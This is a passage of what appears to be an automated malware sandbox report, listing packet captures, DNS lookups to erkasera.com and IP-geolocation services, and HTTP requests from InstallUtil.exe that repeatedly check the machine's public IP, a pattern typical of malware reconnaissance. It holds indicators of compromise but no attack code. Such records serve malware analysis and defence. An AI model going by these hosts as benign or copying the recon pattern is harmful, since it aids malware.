Oct 25, 2024 21:27:21.006705046 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.006750107 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.006784916 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.006793022 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.006834984 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.007369995 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.007410049 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.007441044 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.007446051 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.007477999 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.007496119 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.007648945 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.007689953 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.007714033 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.007718086 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.007745028 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.007767916 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.008361101 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.008402109 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.008452892 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.008456945 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.008482933 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.008502960 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.008671999 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.008713961 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.008753061 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.008757114 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.008768082 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.008799076 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.081114054 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.081135035 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.081202030 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.081222057 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.081254005 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.081274986 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.170991898 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171025991 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171087027 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171128035 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171142101 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171147108 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171189070 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171196938 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171207905 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171257019 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171258926 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171267986 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171299934 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171331882 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171350002 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171385050 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171405077 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171447039 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171502113 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.171514988 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171550989 CEST	443	49746	188.132.193.46	192.168.2.4
Oct 25, 2024 21:27:21.171977997 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:21.178158045 CEST	49746	443	192.168.2.4	188.132.193.46
Oct 25, 2024 21:27:22.315998077 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:22.321429014 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:22.321630001 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:22.321840048 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:22.327675104 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:22.969538927 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:22.975471020 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:22.980941057 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:23.123694897 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:23.169699907 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:23.365739107 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:23.365793943 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:23.365884066 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:23.408739090 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:23.408771992 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.028852940 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.028970957 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.030533075 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.030544043 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.031471014 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.075922966 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.093050957 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.135370016 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.246073008 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.246160984 CEST	443	49754	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.246495008 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.249556065 CEST	49754	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.252321959 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:24.257734060 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:24.399856091 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:24.410181999 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.410238981 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.410363913 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.410651922 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:24.410670042 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:24.450911045 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:25.027817011 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:25.029912949 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:25.029934883 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:25.172933102 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:25.173166990 CEST	443	49755	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:25.173238993 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:25.173691988 CEST	49755	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:25.176457882 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:25.177669048 CEST	49756	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:25.183173895 CEST	80	49756	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:25.183274031 CEST	49756	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:25.183352947 CEST	49756	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:25.188707113 CEST	80	49756	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:25.194601059 CEST	80	49753	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:25.194655895 CEST	49753	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:25.840465069 CEST	80	49756	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:25.842247009 CEST	49757	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:25.842292070 CEST	443	49757	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:25.842487097 CEST	49757	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:25.842801094 CEST	49757	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:25.842825890 CEST	443	49757	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:25.888408899 CEST	49756	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:26.459911108 CEST	443	49757	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:26.461411953 CEST	49757	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:26.461456060 CEST	443	49757	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:26.610883951 CEST	443	49757	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:26.611002922 CEST	443	49757	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:26.611094952 CEST	49757	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:26.611746073 CEST	49757	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:26.617209911 CEST	49758	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:26.623240948 CEST	80	49758	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:26.623328924 CEST	49758	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:26.623567104 CEST	49758	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:26.628928900 CEST	80	49758	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:27.254623890 CEST	80	49758	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:27.256145954 CEST	49759	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:27.256215096 CEST	443	49759	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:27.256325960 CEST	49759	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:27.256702900 CEST	49759	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:27.256726027 CEST	443	49759	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:27.294672012 CEST	49758	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:27.873017073 CEST	443	49759	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:27.880970001 CEST	49759	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:27.881047964 CEST	443	49759	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:28.030261040 CEST	443	49759	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:28.030383110 CEST	443	49759	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:28.030520916 CEST	49759	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:28.032969952 CEST	49759	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:28.035465002 CEST	49758	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:28.035468102 CEST	49760	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:28.042114973 CEST	80	49760	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:28.042321920 CEST	49760	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:28.042321920 CEST	49760	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:28.042561054 CEST	80	49758	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:28.042783976 CEST	49758	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:28.048475027 CEST	80	49760	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:28.678370953 CEST	80	49760	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:28.679702044 CEST	49761	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:28.679739952 CEST	443	49761	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:28.679932117 CEST	49761	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:28.680219889 CEST	49761	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:28.680234909 CEST	443	49761	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:28.732233047 CEST	49760	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:29.299763918 CEST	443	49761	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:29.301646948 CEST	49761	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:29.301682949 CEST	443	49761	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:29.457523108 CEST	443	49761	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:29.457636118 CEST	443	49761	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:29.457695007 CEST	49761	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:29.458296061 CEST	49761	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:29.462606907 CEST	49760	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:29.464059114 CEST	49762	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:29.469789982 CEST	80	49760	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:29.469876051 CEST	49760	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:29.470844984 CEST	80	49762	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:29.470931053 CEST	49762	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:29.471128941 CEST	49762	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:29.478020906 CEST	80	49762	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:30.105936050 CEST	80	49762	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:30.119257927 CEST	49763	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:30.119303942 CEST	443	49763	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:30.119445086 CEST	49763	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:30.119689941 CEST	49763	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:30.119707108 CEST	443	49763	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:30.154086113 CEST	49762	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:30.738404036 CEST	443	49763	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:30.740077972 CEST	49763	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:30.740113974 CEST	443	49763	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:30.891741991 CEST	443	49763	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:30.891836882 CEST	443	49763	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:30.891951084 CEST	49763	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:30.898775101 CEST	49763	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:30.902060986 CEST	49762	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:30.903243065 CEST	49764	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:30.908085108 CEST	80	49762	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:30.908612013 CEST	80	49764	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:30.908684969 CEST	49762	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:30.908734083 CEST	49764	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:30.908843994 CEST	49764	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:30.914089918 CEST	80	49764	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:31.541018009 CEST	80	49764	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:31.543107033 CEST	49765	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:31.543148994 CEST	443	49765	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:31.543231964 CEST	49765	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:31.543627024 CEST	49765	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:31.543642044 CEST	443	49765	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:31.591593027 CEST	49764	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:32.165131092 CEST	443	49765	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:32.167076111 CEST	49765	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:32.167117119 CEST	443	49765	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:32.323227882 CEST	443	49765	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:32.323370934 CEST	443	49765	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:32.323507071 CEST	49765	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:32.324322939 CEST	49765	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:32.328758955 CEST	49764	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:32.330265999 CEST	49766	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:32.334470034 CEST	80	49764	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:32.334582090 CEST	49764	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:32.335968018 CEST	80	49766	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:32.336163044 CEST	49766	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:32.336241007 CEST	49766	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:32.342097998 CEST	80	49766	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:32.978553057 CEST	80	49766	158.101.44.242	192.168.2.4
Oct 25, 2024 21:27:32.992906094 CEST	49767	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:32.992969990 CEST	443	49767	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:32.994966030 CEST	49767	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:32.995263100 CEST	49767	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:32.995285034 CEST	443	49767	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:33.029086113 CEST	49766	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:27:33.609311104 CEST	443	49767	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:33.611848116 CEST	49767	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:33.611888885 CEST	443	49767	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:33.762445927 CEST	443	49767	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:33.762561083 CEST	443	49767	188.114.97.3	192.168.2.4
Oct 25, 2024 21:27:33.762675047 CEST	49767	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:27:33.763082027 CEST	49767	443	192.168.2.4	188.114.97.3
Oct 25, 2024 21:28:17.260802031 CEST	80	49738	158.101.44.242	192.168.2.4
Oct 25, 2024 21:28:17.260876894 CEST	49738	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:28:21.626449108 CEST	80	49745	158.101.44.242	192.168.2.4
Oct 25, 2024 21:28:21.626523972 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:28:30.863182068 CEST	80	49756	158.101.44.242	192.168.2.4
Oct 25, 2024 21:28:30.863393068 CEST	49756	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:28:38.002782106 CEST	80	49766	158.101.44.242	192.168.2.4
Oct 25, 2024 21:28:38.002928972 CEST	49766	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:28:57.344444990 CEST	49745	80	192.168.2.4	158.101.44.242
Oct 25, 2024 21:28:57.350163937 CEST	80	49745	158.101.44.242	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 21:26:57.839811087 CEST	55199	53	192.168.2.4	1.1.1.1
Oct 25, 2024 21:26:58.011492968 CEST	53	55199	1.1.1.1	192.168.2.4
Oct 25, 2024 21:27:05.874970913 CEST	49540	53	192.168.2.4	1.1.1.1
Oct 25, 2024 21:27:05.884012938 CEST	53	49540	1.1.1.1	192.168.2.4
Oct 25, 2024 21:27:06.750216961 CEST	56703	53	192.168.2.4	1.1.1.1
Oct 25, 2024 21:27:06.757900000 CEST	53	56703	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 25, 2024 21:26:57.839811087 CEST	192.168.2.4	1.1.1.1	0x8974	Standard query (0)	erkasera.com	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:05.874970913 CEST	192.168.2.4	1.1.1.1	0xe950	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:06.750216961 CEST	192.168.2.4	1.1.1.1	0x3c95	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 25, 2024 21:26:58.011492968 CEST	1.1.1.1	192.168.2.4	0x8974	No error (0)	erkasera.com		188.132.193.46	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:05.884012938 CEST	1.1.1.1	192.168.2.4	0xe950	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 25, 2024 21:27:05.884012938 CEST	1.1.1.1	192.168.2.4	0xe950	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:05.884012938 CEST	1.1.1.1	192.168.2.4	0xe950	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:05.884012938 CEST	1.1.1.1	192.168.2.4	0xe950	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:05.884012938 CEST	1.1.1.1	192.168.2.4	0xe950	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:05.884012938 CEST	1.1.1.1	192.168.2.4	0xe950	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:06.757900000 CEST	1.1.1.1	192.168.2.4	0x3c95	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 25, 2024 21:27:06.757900000 CEST	1.1.1.1	192.168.2.4	0x3c95	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

erkasera.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:05.897675037 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 25, 2024 21:27:06.531864882 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:06 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2a0a384743884273b4516cba5e1f7411 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 21:27:06.543610096 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:06.690323114 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:06 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3c77039eed21a550e534fc95d6451c6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
Oct 25, 2024 21:27:07.680773973 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:07.830569983 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6512afb9d11b3c6e756a21a6233edc77 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 21:27:08.683366060 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 25, 2024 21:27:09.334266901 CEST	323	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:09 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b9b509972b0d3ced6777e0498b358f57 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	158.101.44.242	80	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
